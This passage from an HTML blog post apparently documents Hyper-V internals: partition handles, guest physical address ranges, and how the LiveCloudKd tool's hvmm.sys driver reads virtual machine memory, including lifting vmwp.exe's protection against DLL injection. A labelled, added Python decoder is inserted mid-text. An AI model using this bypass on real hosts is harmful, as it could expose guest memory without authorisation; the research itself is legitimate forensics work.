<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10 nt!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 ntdll!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 vid_7ffb4de20000!VidCreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 vmwp!MemoryManager::CreateMemoryBlockGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 vmwp!VmbComGpaRange::VmbComGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 vmwp!Vml::VmComMultiInstanceObject<VmbComGpaRange>::CreateInstance</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 vmwp!Vml::CreateComObject<VmbComGpaRange,IMemoryManager</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 vmwp!VmbComMemoryBlock::CreateGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmuidevices!VideoSynthDevice::SetupVramGpaRange</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a vmuidevices!VideoSynthDevice::SynthVidOnVramLocation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b vmuidevices!VideoSynthDevice::OnMessageReceived</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c vmuidevices!VMBusPipeIO::OnReadCompletion</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d vmuidevices!VMBusPipeIO::ProcessCompletionList</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e vmuidevices!VMBusPipeIO::HandleCompletions</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 6pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f vmuidevices!VMBusPipeIO::OnCompletion</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: white; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The last memory block is the mapped memory of the video adapter. A one-page block is used for ACPI devices.</span></div>
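As an added example (not code from the original post or from the hvmm driver), the Python decoder below turns the rdx/rsi pairs recorded above into guest physical address ranges. It assumes rdx carries the start GPA as a page frame number and rsi the number of 4 KiB pages; that reading reproduces the 2300 MB figure exactly (0x8fc00 pages = 2300 MiB) and lets you check the resulting layout for overlaps.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

PAGE_SHIFT = 12              # guest pages are 4 KiB
MIB = 1 << 20

# Constructed input: the three breakpoint hits for the 2300 MB Windows Server 2019
# guest quoted above, in the debugger's "rdx=... rsi=..." form.
SERVER_2019_LOG = [
    "1st call: rdx=0000000000000000 rsi=000000000008fc00",
    "2nd call: rdx=00000000000f8000 rsi=0000000000000800",
    "3rd call: rdx=0000000000fff800 rsi=000000000000024a",
]

_CALL_RE = re.compile(r"rdx=([0-9a-fA-F]+)\s+rsi=([0-9a-fA-F]+)")


@dataclass(frozen=True)
class GpaRange:
    """One guest physical address range created by one call.

    Assumption (the post shows the registers, not their meaning):
    rdx is the start GPA as a page frame number, rsi the page count.
    """
    start_gpfn: int
    page_count: int

    @property
    def start_gpa(self) -> int:
        return self.start_gpfn << PAGE_SHIFT

    @property
    def size(self) -> int:
        return self.page_count << PAGE_SHIFT

    @property
    def end_gpa(self) -> int:
        """Exclusive end address of the range."""
        return self.start_gpa + self.size


def parse_call_log(lines: List[str]) -> List[GpaRange]:
    """Turn each 'rdx=<hex> rsi=<hex>' line into a GpaRange; other lines are ignored."""
    ranges = []
    for line in lines:
        m = _CALL_RE.search(line)
        if m:
            ranges.append(GpaRange(int(m.group(1), 16), int(m.group(2), 16)))
    return ranges


def find_overlaps(ranges: List[GpaRange]) -> List[Tuple[GpaRange, GpaRange]]:
    """Return neighbouring pairs whose address ranges overlap; a sane layout has none."""
    ordered = sorted(ranges, key=lambda r: r.start_gpa)
    return [(a, b) for a, b in zip(ordered, ordered[1:]) if a.end_gpa > b.start_gpa]


def guest_ram_mib(ranges: List[GpaRange]) -> int:
    """Guest RAM is the largest block (the first call in the post); size in MiB."""
    return max(r.size for r in ranges) // MIB


def summarize(lines: List[str]) -> Dict[str, object]:
    """Decode a call log into (start, end, size in KiB) triples plus sanity figures."""
    ranges = parse_call_log(lines)
    return {
        "blocks": [(hex(r.start_gpa), hex(r.end_gpa), r.size // 1024) for r in ranges],
        "ram_mib": guest_ram_mib(ranges),
        "overlaps": len(find_overlaps(ranges)),
    }


if __name__ == "__main__":
    for key, value in summarize(SERVER_2019_LOG).items():
        print(f"{key}: {value}")
```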
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 403px; overflow: hidden; width: 438px;"><img height="403" src="https://lh5.googleusercontent.com/8EApoTbrFapcwiJK69PXIodyC7b052AxNNoF7UgataavrHcP33O__j-nIPiN3aMzq9a2M-i7Wd15__m4zNylWyB5viw8SdwR5LcQPtQIhnkIjFfay1v5BVIFo-2jbF4QhN4aBO4" style="margin-left: 0px; margin-top: 0px;" width="438" /></span></span></div>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Among other things, the hvmm.sys driver is needed to remove the vmwp.exe protection that prevents DLL injection into that process. The driver works with partition handles carrying the Prtn signature (VM_PROCESS_CONTEXT), but vid.sys supports a second type as well: EXO partitions. EXO partitions can be created through the WinHv Platform API library (https://docs.microsoft.com/en-us/virtualization/api/hypervisor-platform/hypervisor-platform), which allows third-party developers to make their virtualization solutions compatible with Hyper-V and run them side by side with native Hyper-V VMs. Currently VirtualBox, QEMU and Bochs (e.g. in the applepie implementation) support this. VMware, one year after these APIs appeared in Windows 1803, finally added support to its VMware Workstation product too. A new VMware build will probably be released after Windows 10 build 1909 (19H2).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, on Windows Server 2016 and earlier it is still possible to use the vid.dll interface without a driver: the API execution lock is missing from vid.sys on those systems, so hvmm.sys is not needed there. WDAG and Windows Sandbox containers, on the other hand, exist only on Windows 10, where the API is locked. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Which structures are needed to work with guest OS memory? I tried to visualize them in a diagram. Further on in the article it should become clear how they are used.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 285px; overflow: hidden; width: 507px;"><img height="224" src="https://lh6.googleusercontent.com/5DLjWoxUr4weG4Z3I7wltzr44kyvMAwnoiUZB9I52tT-Mkc466Z8P3_AJGlINMVdVxhDdKeIZC3I0rE01LeLcn7V27Zto3t1KKN5zKF0jn9NaZp5Tn09KYPVpvAcCKcT1ltANuQ" style="margin-left: 0px; margin-top: 0px;" width="400" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Objects:</span></div>
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition handle (VM_PROCESS_CONTEXT);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPAR-handle (GPAR - Guest physical Address Range);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Array of GPAR elements (GPAR Array);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Array of MBlock-objects (MBlock Array. MBlock – memory block GPA range);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">GPAR-object (GPAR_OBJECT);</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">MBlock-object (MEMORY_BLOCK).</span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition handle is the main object, which is used by hvmm driver. When user mode section of partition handle is created, its kernel mode part contains all the necessary information about the created partition. The search algorithm for the user mode component hasn’t changed since Windows Server 2008 R2, and this component can be obtained by enumeration of handles, opened by the vmwp.exe process. For this, find all open file descriptors with the names like \Device\000000 and try to get partition name.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 74px; overflow: hidden; width: 430px;"><img height="74" src="https://lh6.googleusercontent.com/gEDbTlblD1ZFiunauCUfBkX4iGqsO5TIoeistR4wvJKPWqafk_3P490XGF7gFeLI39TeuqKYllMU0SoVqZ0eAkN73FxpK1dv6kpWoS5ZpDvIUlmwPFe9uG2kg82XcXbMaA_xpPI" style="margin-left: 0px; margin-top: 0px;" width="430" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the name can be obtained, it means, that we found a valid partition handle. In my practice, there are 3 similar objects for each Full VM or container. If we pass the obtained values to the kernel function nt!ObReferenceObjectByHandle, then in two cases it returns NULL, that means objects are invalid. For the current descriptor, we get the pointer to the partition handle.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Yes, object pointers offsets inside partition handle are fixed and differ for each version of Windows. But for same version of Windows they aren’t changed, so the method is quite reliable.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Partition handle contains fields, that point to an array of MBlock objects (initialized in </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><br /></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vid.sys!VsmmMemoryBlockpInitialize) and an array of GPAR objects (initialized in vid.sys!VsmmGpaRangepInitialize).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">By the way, you do not need to confuse the partition handle with the Windows 10 memory partition structure, which !partition WinDBG command displays. This is the _MI_PARTITION structure, which contains basic information about current state of the operating system memory. This object is created without an active hypervisor (or active – no matter).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 260px; overflow: hidden; width: 280px;"><img height="260" src="https://lh6.googleusercontent.com/06_S6Yw4ZjqSH_wC6IQ4EqvS13-u_BTj5RwTp5xDuifVyP2pwfHebrQDyHmSYHKbP3NWNf0RI5hpYLPSDqCc1XPfUOkXkJUI6xWnlvudmSwS63txNUeUuCse8TWKrQKfREl7LoU" style="margin-left: 0px; margin-top: 0px;" width="280" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can read more about it in the 1</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="font-size: 0.6em; vertical-align: super;">st</span></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> part of Windows Internals book (7th edition). I couldn’t find that information in MSDN (current Microsoft Docs).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Containers and Full VM have different accessing memory methods, so let's look at memory reading examples for both. Let's start with Full VM based on Windows Server 2019.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Full VM memory reading</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">LiveCloudKd application passes the request to the driver for reading guest OS memory block. The data, required for the request, is packed into the GPA_INFO structure. This structure contains start memory address, number of bytes to read and service information about virtual machine partition (PID vmwp, partition id).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 53px; overflow: hidden; width: 410px;"><img height="53" src="https://lh5.googleusercontent.com/6Xl1-yjSmYxCSyRq0B_Ia4mOHfIlbp6TE2vn5xDzghK__j_AZa4fQogh_i3o6EamYjnABNXGES6f6H8-kMkzY4XF_KiH_ubNkDWkogB6Z0rdinwFkN1iVwq0EAYlSlu50FFh4ms" style="margin-left: 0px; margin-top: 0px;" width="410" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, get partition handle. To do this, just call the nt!ObReferenceObjectByHandle function with the passed descriptor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 71px; overflow: hidden; width: 294px;"><img height="71" src="https://lh5.googleusercontent.com/G9lyw0nU5fYd2vdRzE4mlyaQaw5zrJkkZmpE7cDwG0kwhwH6RVcDUEvUWwwbEkcUZIw8K51YIAIeESWuw9G1jKIFjFIvqmxMD9lIqG5WT0o9IlK0890QGRkUVfc6DhTik2rO4Ew" style="margin-left: 0px; margin-top: 0px;" width="294" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Type of getting object is FILE_OBJECT. To gain access to the body of the descriptor, you must get a pointer to FsContext.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 29px; overflow: hidden; width: 400px;"><img height="29" src="https://lh3.googleusercontent.com/uhdh35IqHUepGjn8MupcSAf7YJOQOeiD8GCzYz5kgXwsz__9E30STj6ceQOcgRifxEJW8UhjMaiduLmFCADre6RVIOmer9cODHLUGs2c2lHriPD_4PYctYx6G582iMjBZ3D-mLg" style="margin-left: 0px; margin-top: 0px;" width="400" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Beginning part of partition handle looks like:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 110px; overflow: hidden; width: 371px;"><img height="110" src="https://lh6.googleusercontent.com/yafgm0tw6wxZ4U-PI5AFa36LJ6EpX6MqsmrlwXtkvnQ6gagduIbiev-8co-bzbPX-EqLsEXc4BuhTMlFZI-lYI5iL_iKhF1atkMCAwjRPYxTevc0JA0yH39PEmtds-FivhfTpOg" style="margin-left: 0px; margin-top: 0px;" width="371" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 256px; overflow: hidden; width: 374px;"><img height="256" src="https://lh5.googleusercontent.com/0ZHNtXomahdGWRJznfypfIsf2S1MLwm-Assr1dTUZJbmLtogrjHJ19eMOkYF7xYPiVT2ET03drp6F6jq1CEBRypyipmneiHBq0fRlFqy_7iBE3TZK1Ob2EB5wrKGysNL8i5BQMk" style="margin-left: 0px; margin-top: 0px;" width="374" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The first 0x278 bytes contain section signature, the name and its identifier. The size of structure is not small (0x3EF0 for Windows Server 2019) and it is different for different operating systems. The exact size of partition handle can be found in vid.sys!VidCreatePartition (by the amount of memory allocated for it). We will not need it in driver.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">When we get partition handle type (VmType), we can perform one of two procedures for memory blocks reading. There are actually quite a lot of possible VmType values, and moreover, they differ for different versions of operating systems. For example, VmType for Full VM in Windows 10 and Windows Server 2019 have different values. Not all of them have been investigated (especially for operating systems such as Linux, because WinDBG, that launched by LiveCloudKd, doesn’t work with them). But finally partitions of virtual machines were divided into two categories: container’s partitions and Full VM partitions.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hvmm.sys!VidGetFullVmMemoryBlock function at the input receives a section descriptor, a buffer in which to write the received data, the size of the buffer in bytes and the GPA of the virtual machine.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">BOOLEAN</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> VidGetFullVmMemoryBlock(</span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVM_PROCESS_CONTEXT</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pPartitionHandle</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span style="background-color: transparent; color: #2b91af; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PCHAR</span><span style="background-color: transparent; color: black; font-family: "consolas" , sans-serif; font-size: 9.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: grey; font-family: 
